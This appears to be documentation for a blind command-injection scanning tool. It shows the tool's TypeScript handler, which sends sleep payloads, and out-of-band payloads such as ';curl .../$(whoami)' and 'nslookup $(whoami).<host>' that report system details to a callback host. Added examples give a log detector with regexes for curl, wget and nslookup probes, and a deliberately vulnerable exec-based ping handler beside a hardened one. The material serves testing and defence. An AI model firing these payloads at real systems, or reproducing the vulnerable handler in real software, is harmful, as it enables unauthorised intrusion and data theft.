cmdi_blind_detect
Detect blind command injection vulnerabilities using time delay analysis and out-of-band callbacks to identify security weaknesses in web applications.
Instructions
Detect blind command injection via time delay and OOB callbacks. Tests sleep-based delay detection and optional out-of-band (curl/nslookup to callback). Returns time_based results array and oob_payloads list. Side effects: Executes sleep on target if vulnerable. OOB payloads call back to callback_url.
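From the defender's side, the probes this tool sends leave a recognisable shape in web server logs: a shell separator or substitution (`;`, `&&`, `|`, backticks, `$( )`) followed by a delay command (`sleep`) or an outbound client (`curl`, `nslookup`). The following TypeScript is an added example, not part of the cmdi_blind_detect tool or its project: it scans combined-format access-log lines for that shape and reports which parameter carried it. The log lines, the client addresses and the callback host `cb.example.net` are constructed for the example; the log layout and the regular expressions are assumptions, not anything the tool emits.

```typescript
// Added example (not part of the cmdi_blind_detect tool): flag access-log
// entries whose query parameters carry the shell-breakout + command pattern
// that time-delay and OOB command-injection probes leave behind.
// All log lines below are constructed for this example.

type Reason = "time-delay probe" | "out-of-band probe" | "shell metacharacters";

interface Finding {
  ip: string;
  path: string;
  parameter: string;
  value: string;
  reason: Reason;
}

// Operators that end the intended command and hand the rest of the value to a
// shell. A lone '&' is deliberately not listed: in a query string it is also
// the ordinary parameter separator, so on its own it is not evidence.
const SHELL_BREAKOUT = /(;|&&|\|\||\||`|\$\()/;
const DELAY_COMMAND = /\b(sleep|ping|timeout)\b/i;
const OUTBOUND_COMMAND = /\b(curl|wget|nslookup|dig)\b/i;

// Combined log format: ip ident user [time] "METHOD target proto" status size ...
const LOG_LINE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)/;

function classify(value: string): Reason | null {
  if (!SHELL_BREAKOUT.test(value)) return null;
  if (DELAY_COMMAND.test(value)) return "time-delay probe";
  if (OUTBOUND_COMMAND.test(value)) return "out-of-band probe";
  return "shell metacharacters";
}

// Decode the query once so %3B, %26, %7C and '+' are judged as the characters
// the application would actually see, then split into name=value pairs.
// Heuristic: an '&' that is not followed by another "name=" stays attached to
// the preceding value, so "cmd=1&&sleep 5" is kept as one pair.
function queryPairs(rawQuery: string): Array<[string, string]> {
  let decoded: string;
  try {
    decoded = decodeURIComponent(rawQuery.replace(/\+/g, " "));
  } catch {
    decoded = rawQuery; // malformed percent-encoding: inspect it as-is
  }
  return decoded.split(/&(?=[^&=]+=)/).map((pair): [string, string] => {
    const eq = pair.indexOf("=");
    return eq === -1 ? [pair, ""] : [pair.slice(0, eq), pair.slice(eq + 1)];
  });
}

function scanLogLine(line: string): Finding | null {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  const [, ip, , target] = m;
  const q = target.indexOf("?");
  if (q === -1) return null;
  const path = target.slice(0, q);
  for (const [parameter, value] of queryPairs(target.slice(q + 1))) {
    const reason = classify(value);
    if (reason) return { ip, path, parameter, value, reason };
  }
  return null;
}

function scanLog(lines: string[]): Finding[] {
  return lines.map(scanLogLine).filter((f): f is Finding => f !== null);
}

// Constructed sample: a benign request, three probes, and a benign request
// whose '&' is just text in a search term.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /ping?host=10.0.0.1 HTTP/1.1" 200 512 "-" "curl/8.0"',
  '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /ping?host=10.0.0.1%3Bsleep+5 HTTP/1.1" 200 512 "-" "curl/8.0"',
  '203.0.113.5 - - [10/Oct/2023:13:55:47 +0000] "GET /ping?host=10.0.0.1%26%26sleep%205 HTTP/1.1" 200 512 "-" "curl/8.0"',
  '203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /ping?host=10.0.0.1%3Bnslookup+%24(whoami).cb.example.net HTTP/1.1" 200 512 "-" "curl/8.0"',
  '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=fish+%26+chips HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`${f.ip} ${f.path} ${f.parameter}=${JSON.stringify(f.value)} -> ${f.reason}`);
}
```

The decode-then-split order matters: the probes above arrive percent-encoded, and a rule that matched the raw query string would miss `%3B` and `%26%26`. The `&`-handling heuristic is what keeps the `&&sleep` variant attached to the `host` parameter instead of turning `sleep 5` into a parameter name of its own. A single `&` is tolerated, which is why the `fish & chips` search is not reported.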
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Target URL | |
| parameter | Yes | Vulnerable parameter name | |
| base_value | No | Legitimate parameter value | `1` |
| method | No | HTTP method (`GET` or `POST`) | `POST` |
| callback_url | No | Out-of-band callback URL for OOB detection (e.g. Burp Collaborator) | |
| delay_seconds | No | Sleep duration for time-based detection (1 to 10 seconds) | `5` |
Implementation Reference
- src/tools/cmdi.ts:100-181 (handler): the implementation of the `cmdi_blind_detect` tool, which performs time-based and OOB command injection detection.

```typescript
server.tool(
  "cmdi_blind_detect",
  "Detect blind command injection via time delay and OOB callbacks. Tests sleep-based delay detection and optional out-of-band (curl/nslookup to callback). Returns time_based results array and oob_payloads list. Side effects: Executes sleep on target if vulnerable. OOB payloads call back to callback_url.",
  {
    url: z.string().describe("Target URL"),
    parameter: z.string().describe("Vulnerable parameter name"),
    base_value: z.string().optional().describe("Legitimate parameter value"),
    method: z.enum(["GET", "POST"]).optional().describe("HTTP method"),
    callback_url: z.string().optional().describe("Out-of-band callback URL for OOB detection (e.g. Burp Collaborator)"),
    delay_seconds: z.number().min(1).max(10).optional().describe("Sleep duration for time-based detection"),
  },
  async ({ url, parameter, base_value = "1", method = "POST", callback_url, delay_seconds = 5 }) => {
    requireTool("curl");
    const cb = callback_url ?? "https://collaborator.example.com";

    // Time-based payloads
    const sleepPayloads = [
      `${base_value};sleep ${delay_seconds}`,
      `${base_value}&&sleep ${delay_seconds}`,
      `${base_value}|sleep ${delay_seconds}`,
      `${base_value}\`sleep ${delay_seconds}\``,
      `${base_value}$(sleep ${delay_seconds})`,
    ];

    // Send each payload once and record curl's total request time.
    const timeResults = [];
    for (const payload of sleepPayloads) {
      let curlArgs: string[];
      if (method === "GET") {
        curlArgs = ["-sk", "-o", "/dev/null", "-w", "%{time_total}", `${url}?${parameter}=${payload}`];
      } else {
        curlArgs = ["-sk", "-o", "/dev/null", "-w", "%{time_total}", "-X", "POST", "-d", `${parameter}=${payload}`, url];
      }
      const res = await runCmd("curl", curlArgs, { timeout: delay_seconds + 15 });
      let elapsed = 0.0;
      try {
        elapsed = parseFloat(res.stdout);
        if (isNaN(elapsed)) elapsed = 0.0;
      } catch {
        elapsed = 0.0;
      }
      // A response that took at least 80% of the requested delay counts as triggered.
      const triggered = elapsed >= delay_seconds * 0.8;
      timeResults.push({ payload, elapsed_seconds: Math.round(elapsed * 100) / 100, triggered });
    }

    // OOB payloads (generate but don't verify — user checks collaborator)
    const cbHost = cb.replace("https://", "").replace("http://", "");
    const oobPayloads = [
      `${base_value};curl ${cb}/$(whoami)`,
      `${base_value};nslookup $(whoami).${cbHost}`,
      `${base_value}$(curl ${cb}/$(id))`,
      `${base_value}\`curl ${cb}/$(hostname)\``,
    ];

    const anyTriggered = timeResults.some((r) => r.triggered);
    const result = {
      time_based_vulnerable: anyTriggered,
      time_results: timeResults,
      oob_payloads_generated: oobPayloads,
      hint: callback_url
        ? "Check your callback server for OOB interactions after sending these payloads manually."
        : "Set callback_url for out-of-band detection.",
    };
    return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
  }
);
```
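The sleep payloads above only produce a delay when the target splices the parameter into a command line that a shell interprets. The following TypeScript is an added example, not code from the cmdi_blind_detect tool or its project: a hypothetical `/ping` handler written two ways. `pingUnsafe` interpolates the value into a shell string, so `1;sleep 5` runs as two commands; `pingSafe` allowlists the value and passes it as its own argv entry through `execFile`, where `;`, `&&`, `|`, backticks and `$( )` are inert because no shell ever sees them. The handler names, the hostname allowlist regex and the 5-second process timeout are assumptions.

```typescript
// Added example, not code from the cmdi_blind_detect tool or its project.
// The /ping handler, HOST_RE and the timeout are hypothetical choices.
import { exec, execFile } from "node:child_process";
import { promisify } from "node:util";

const execAsync = promisify(exec);
const execFileAsync = promisify(execFile);

// VULNERABLE: the user-supplied value becomes part of a shell command line, so
// a value like "1;sleep 5", "1&&sleep 5", "1`sleep 5`" or "1$(sleep 5)" makes
// the shell run sleep after (or instead of) ping. This is the pattern a blind
// time-based probe is looking for.
export async function pingUnsafe(host: string): Promise<string> {
  const { stdout } = await execAsync(`ping -c 1 ${host}`);
  return stdout;
}

// Allowlist: a hostname or IPv4 literal made of dot-separated labels of
// letters, digits and '-', each label starting and ending alphanumerically.
// No shell metacharacter, space or leading '-' can pass.
const HOST_RE =
  /^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/;

// Decide what would be executed without executing it: returns the file and
// argv that pingSafe hands to execFile, or throws if the value is rejected.
export function buildPingCommand(host: string): { file: string; args: string[] } {
  if (host.length > 253 || !HOST_RE.test(host)) {
    throw new Error("invalid host");
  }
  // Each argv element is passed to ping verbatim; there is no shell to split
  // on ';' or expand $( ), so the allowlist is defence in depth, not the only line.
  return { file: "ping", args: ["-c", "1", host] };
}

// HARDENED: validate, then execFile with an argument array. The timeout keeps
// a non-responding host from tying up the request worker.
export async function pingSafe(host: string): Promise<string> {
  const { file, args } = buildPingCommand(host);
  const { stdout } = await execFileAsync(file, args, { timeout: 5000 });
  return stdout;
}

// Dry run over constructed inputs: show what would reach execFile, or that the
// value is rejected before any process starts.
for (const candidate of ["10.0.0.1", "example.com", "10.0.0.1;sleep 5", "10.0.0.1&&sleep 5", "$(sleep 5)"]) {
  try {
    console.log(candidate, "->", JSON.stringify(buildPingCommand(candidate).args));
  } catch (e) {
    console.log(candidate, "-> rejected:", (e as Error).message);
  }
}
```

Separating `buildPingCommand` from `pingSafe` is deliberate: the security decision (what string reaches which argv slot) can be unit-tested without spawning `ping`, and code review can confirm that the only path to a process spawn goes through the allowlist. Replacing `exec` with `execFile` alone already removes the shell; the allowlist on top of it rejects values that are not hostnames at all, so the process never starts for a probe payload and nothing about the rejection timing leaks to the caller.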